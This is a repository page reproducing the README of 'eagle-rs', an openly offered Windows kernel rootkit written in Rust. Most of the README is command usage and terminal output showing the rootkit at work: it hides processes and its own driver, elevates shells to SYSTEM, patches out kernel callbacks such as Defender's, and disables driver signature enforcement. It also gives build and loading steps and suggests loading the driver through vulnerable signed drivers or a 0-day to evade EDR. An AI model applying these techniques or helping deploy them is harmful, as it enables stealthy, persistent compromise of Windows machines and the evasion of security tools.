memN0ps
eagle-rs
Rust

Rusty Rootkit - Windows Kernel Rookit in Rust (Codename: Eagle)

Last updated Jun 30, 2026
578
Stars
76
Forks
0
Issues
0
Stars/day
Attention Score
33
Language breakdown
Rust 100.0%
โ–ธ Files click to expand
README

Windows Kernel Rookit in Rust (Codename: Eagle)

Blog: https://memn0ps.github.io/rusty-windows-kernel-rootkit/

Features (Development in progress)

  • Protect / unprotect process (Done)
  • Elevate to NT AUTHORITY\\SYSTEM and Enable all token privileges (Done)
  • Hide process (Done)
  • Hide driver (Done)
  • Enumerate loaded kernel modules (Done)
  • Enumerate / remove kernel callbacks
* PsSetCreateProcessNotifyRoutine (Done) * PsSetCreateThreadNotifyRoutine (Todo) * PsSetLoadImageNotifyRoutine (Todo) * CmRegisterCallbackEx (Todo) * ObRegisterCallbacks (Todo)
  • DSE enable/disable (Done)

Usage

PS C:\Users\memn0ps\Desktop> .\client.exe -h
client 0.1.0

USAGE: client.exe <SUBCOMMAND>

OPTIONS: -h, --help Print help information -V, --version Print version information

SUBCOMMANDS: callbacks driver dse help Print this message or the help of the given subcommand(s) process

client.exe-process

USAGE: client.exe process --name <PROCESS> <--protect|--unprotect|--elevate|--hide>

OPTIONS: -e, --elevate Elevate all token privileges -h, --help Print help information --hide Hide a process using Direct Kernel Object Manipulation (DKOM) -n, --name <PROCESS> Target process name -p, --protect Protect a process -u, --unprotect Unprotect a process

PS C:\Users\memn0ps\Desktop> .\client.exe callbacks -h
client.exe-callbacks

USAGE: client.exe callbacks <--enumerate|--patch <PATCH>>

OPTIONS: -e, --enumerate Enumerate kernel callbacks -h, --help Print help information -p, --patch <PATCH> Patch kernel callbacks 0-63

PS C:\Users\memn0ps\Desktop> .\client.exe dse -h
client.exe-dse

USAGE: client.exe dse <--enable|--disable>

OPTIONS: -d, --disable Disable Driver Signature Enforcement (DSE) -e, --enable Enable Driver Signature Enforcement (DSE) -h, --help Print help information

PS C:\Users\memn0ps\Desktop> .\client.exe driver -h
client.exe-driver

USAGE: client.exe driver <--hide|--enumerate>

OPTIONS: -e, --enumerate Enumerate loaded kernel modules -h, --help Print help information --hide Hide a driver using Direct Kernel Object Manipulation (DKOM)

Enumerate and Patch Kernel Callbacks

PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 11
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")
[10] 0xffffbd8d43afb63f ("Eagle.sys")
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --patch 10
[+] Callback patched successfully at index 10
PS C:\Users\memn0ps\Desktop> .\client.exe callbacks --enumerate
Total Kernel Callbacks: 10
[0] 0xffffbd8d3d2502df ("ntoskrnl.exe")
[1] 0xffffbd8d3d2fe81f ("cng.sys")
[2] 0xffffbd8d3db2bc8f ("WdFilter.sys")
[3] 0xffffbd8d3db2bf8f ("ksecdd.sys")
[4] 0xffffbd8d3db2c0df ("tcpip.sys")
[5] 0xffffbd8d3f10705f ("iorate.sys")
[6] 0xffffbd8d3f10765f ("CI.dll")
[7] 0xffffbd8d3f10789f ("dxgkrnl.sys")
[8] 0xffffbd8d3fa37cff ("vm3dmp.sys")
[9] 0xffffbd8d3f97104f ("peauth.sys")

Protect / Unprotect Process

PS C:\Users\memn0ps\Desktop> .\client.exe process --name notepad.exe --protect
[+] Process protected successfully 2104

Protect

PS C:\Users\memn0ps\Desktop> .\client.exe process --name notepad.exe --unprotect
[+] Process unprotected successfully 2104

Protect

Elevate to NT AUTHORITY\\System and Enable All Token Privileges

PS C:\Users\memn0ps\Desktop> whoami /all

USER INFORMATION

================== ============================================== windows-10-vm\user S-1-5-21-3694103140-4081734440-3706941413-1001

GROUP INFORMATION


Group Name Type SID Attributes ============================================================= ================ ============ ================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only BUILTIN\Performance Log Users Alias S-1-5-32-559 Mandatory group, Enabled by default, Enabled group BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\Medium Mandatory Level Label S-1-16-8192

PRIVILEGES INFORMATION


Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled

PS C:\Users\memn0ps\Desktop> .\client.exe process --name powershell.exe --elevate
[+] Tokens privileges elevated successfully 6376
PS C:\Users\memn0ps\Desktop> whoami /all

USER INFORMATION


User Name SID =================== ======== nt authority\system S-1-5-18

GROUP INFORMATION


Group Name Type SID Attributes ====================================== ================ ============ ================================================== BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group Mandatory Label\System Mandatory Level Label S-1-16-16384

PRIVILEGES INFORMATION


Privilege Name Description State ========================================= ================================================================== ======= SeCreateTokenPrivilege Create a token object Enabled SeAssignPrimaryTokenPrivilege Replace a process level token Enabled SeLockMemoryPrivilege Lock pages in memory Enabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled SeTcbPrivilege Act as part of the operating system Enabled SeSecurityPrivilege Manage auditing and security log Enabled SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemProfilePrivilege Profile system performance Enabled SeSystemtimePrivilege Change the system time Enabled SeProfileSingleProcessPrivilege Profile single process Enabled SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled SeCreatePagefilePrivilege Create a pagefile Enabled SeCreatePermanentPrivilege Create permanent shared objects Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeDebugPrivilege Debug programs Enabled SeAuditPrivilege Generate security audits Enabled SeSystemEnvironmentPrivilege Modify firmware environment values Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Enabled SeManageVolumePrivilege Perform volume maintenance tasks Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled SeRelabelPrivilege Modify an object label Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled SeCreateSymbolicLinkPrivilege Create symbolic links Enabled SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled

PS C:\Users\memn0ps\Desktop>

Enable / Disable Driver Signature Enforcement (DSE)

PS C:\Users\memn0ps\Desktop> .\client.exe dse --enable
Bytes returned: 16
[+] Driver Signature Enforcement (DSE) enabled: 0x6
0: kd> db 0xfffff8005a6683b8 L1
fffff8005a6683b8  06</code></pre>

<pre><code class="lang-">PS C:\Users\memn0ps\Desktop&gt; .\client.exe dse --disable Bytes returned: 16 [+] Driver Signature Enforcement (DSE) disabled: 0xe</code></pre>

<pre><code class="lang-">0: kd&gt; db 0xfffff8005a6683b8 L1 fffff8005a6683b8 0e

Hide Process

CMD

PS C:\Users\memn0ps\Desktop> .\client.exe process --name powershell.exe --hide
[+] Process is hidden successfully: 6376

CMD

Hide Driver

Hidden from ZwQuerySystemInformation and PsLoadedModuleList

PS C:\Users\memn0ps\Desktop> .\client.exe driver --enumerate
Total Number of Modules: 185
[0] 0xfffff80058c00000 "ntoskrnl.exe"
[1] 0xfffff80054d20000 "hal.dll"
<..OMITTED..>
[180] 0xfffff80054600000 "KERNEL32.dll"
[181] 0xfffff80054200000 "ntdll.dll"
[182] 0xfffff800553f0000 "KERNELBASE.dll"
[183] 0xfffff800556f0000 "MpKslDrv.sys"
[184] 0xfffff80055720000 "Eagle.sys"
[+] Loaded modules enumerated successfully
PS C:\Users\memn0ps\Desktop> .\client.exe driver --hide
[+] Driver hidden successfully
PS C:\Users\memn0ps\Desktop> .\client.exe driver --enumerate
Total Number of Modules: 184
[0] 0xfffff80058c00000 "ntoskrnl.exe"
[1] 0xfffff80054d20000 "hal.dll"
<..OMITTED..>
[180] 0xfffff80054600000 "KERNEL32.dll"
[181] 0xfffff80054200000 "ntdll.dll"
[182] 0xfffff800553f0000 "KERNELBASE.dll"
[183] 0xfffff800556f0000 "MpKslDrv.sys"
[+] Loaded modules enumerated successfully

Install Rust

To start using Rust, download the installer, then run the program and follow the onscreen instructions. You may need to install the Visual Studio C++ Build tools when prompted to do so.

Install

Install and change to Rust nightly

rustup toolchain install nightly
rustup default nightly

Install cargo-make

Install cargo-make

cargo install cargo-make

Install WDK/SDK

  • Step 1: Install Visual Studio 2019
  • Step 2: Install Windows 11 SDK (22000.1)
  • Step 3: Install Windows 11 WDK

Build Driver

Change directory to .\driver\ and build driver

cargo make sign

Build Client

Change directory to .\client\ and build client

cargo build

Enable Test Mode or Test Signing Mode

bcdedit /set testsigning on

[Optional] Debug via Windbg

bcdedit /debug on
bcdedit /dbgsettings net hostip:<IP> port:<PORT>

Create / Start Service

You can use Service Control Manager or OSR Driver Loader to load your driver.

PS C:\Users\memn0ps> sc.exe create Eagle type= kernel binPath= C:\Windows\System32\Eagle.sys
[SC] CreateService SUCCESS
PS C:\Users\memn0ps> sc.exe query Eagle

SERVICE_NAME: Eagle TYPE : 1 KERNEL_DRIVER STATE : 1 STOPPED WIN32EXITCODE : 1077 (0x435) SERVICEEXITCODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PS C:\Users\memn0ps> sc.exe start Eagle

SERVICE_NAME: Eagle TYPE : 1 KERNEL_DRIVER STATE : 4 RUNNING (STOPPABLE, NOTPAUSABLE, IGNORESSHUTDOWN) WIN32EXITCODE : 0 (0x0) SERVICEEXITCODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 PID : 0 FLAGS : PS C:\Users\memn0ps> sc.exe stop Eagle

SERVICE_NAME: Eagle TYPE : 1 KERNEL_DRIVER STATE : 1 STOPPED WIN32EXITCODE : 0 (0x0) SERVICEEXITCODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0

Currently, this driver does not support manual mapping. However, an alternative way to load your driver is to manually map it by exploiting an existing CVE in a signed driver that is already loaded such as Intel or Capcom, although vulnerable drivers can be flagged easily by EDRs or ACs.

  • https://github.com/TheCruZ/kdmapper (iqvw64e.sys Intel driver)
  • https://github.com/not-wlan/drvmap (capcom.sys Capcom driver)
  • https://github.com/zorftw/kdmapper-rs
Otherwise you can always get an extended validation (EV) code signing certificate by Microsoft which goes through a "vetting" process or use a 0-day which is really up to you lol.

Note

A better way to code Windows Kernel Drivers in Rust is to create bindings as shown in the references below. However, using someone else's bindings hides the functionality and this is why I made it the classic way unless, of course, you create your own bindings. I plan on refactoring the code in the future but for now, it will be a bit messy and incomplete.

I made this project for fun and because I really like Rust and Windows Internals. This is obviously not perfect or finished yet. if you would like to learn more about Windows Kernel Programming then feel free to check out the references below. The prefered safe and robust way of coding Windows Kernel Drivers in Rust is shown here:

  • https://codentium.com/guides/windows-dev/
  • https://github.com/StephanvanSchaik/windows-kernel-rs/

References and Credits

  • https://not-matthias.github.io/kernel-driver-with-rust/ (Big thanks to @not_matthias)
  • https://github.com/not-matthias/kernel-driver-with-rust/
  • https://courses.zeropointsecurity.co.uk/courses/offensive-driver-development (Big thanks to @_RastaMouse)
  • https://leanpub.com/windowskernelprogramming Windows Kernel Programming Book (Big thanks to Pavel Yosifovich @zodiacon)
  • https://www.amazon.com/Rootkits-Subverting-Windows-Greg-Hoglund/dp/0321294319 (Big thanks to Greg Hoglund and James Butler for Rootkits: Subverting the Windows Kernel Book)
  • https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/ (Big thanks to HackSysTeam)
  • https://codentium.com/guides/windows-dev/
  • https://github.com/StephanvanSchaik/windows-kernel-rs/
  • https://github.com/rmccrystal/kernel-rs
  • https://github.com/pravic/winapi-kmd-rs
  • https://guidedhacking.com/
  • https://www.unknowncheats.me/
  • https://gamehacking.academy/
  • https://secret.club/
  • https://back.engineering/
  • https://www.vergiliusproject.com/kernels/x64
  • https://www.crowdstrike.com/blog/evolution-protected-processes-part-1-pass-hash-mitigations-windows-81/
  • https://discord.com/invite/rust-lang-community (Big thanks to: WithinRafael, Nick12, Zuix, DuckThatSits, matt1992, kpreid, Bruh and many others)
  • https://twitter.com/thesecretclub/status/1386215138148196353 Discord (hugsy, themagicalgamer)
  • https://www.rust-lang.org/
  • https://doc.rust-lang.org/book/
  • https://posts.specterops.io/mimidrv-in-depth-4d273d19e148
  • https://br-sn.github.io/Removing-Kernel-Callbacks-Using-Signed-Drivers/
  • https://www.mdsec.co.uk/2021/06/bypassing-image-load-kernel-callbacks/
  • https://m0uk4.gitbook.io/notebooks/mouka/windowsinternal/find-kernel-module-address-todo
  • https://github.com/XaFF-XaFF/Cronos-Rootkit/
  • https://github.com/JKornev/hidden
  • https://github.com/landhb/HideProcess
  • https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/manipulating-activeprocesslinks-to-unlink-processes-in-userland
  • https://www.ired.team/miscellaneous-reversing-forensics/windows-kernel-internals/how-kernel-exploits-abuse-tokens-for-privilege-escalation
๐Ÿ”— More in this category

ยฉ 2026 GitRepoTrend ยท memN0ps/eagle-rs ยท Updated daily from GitHub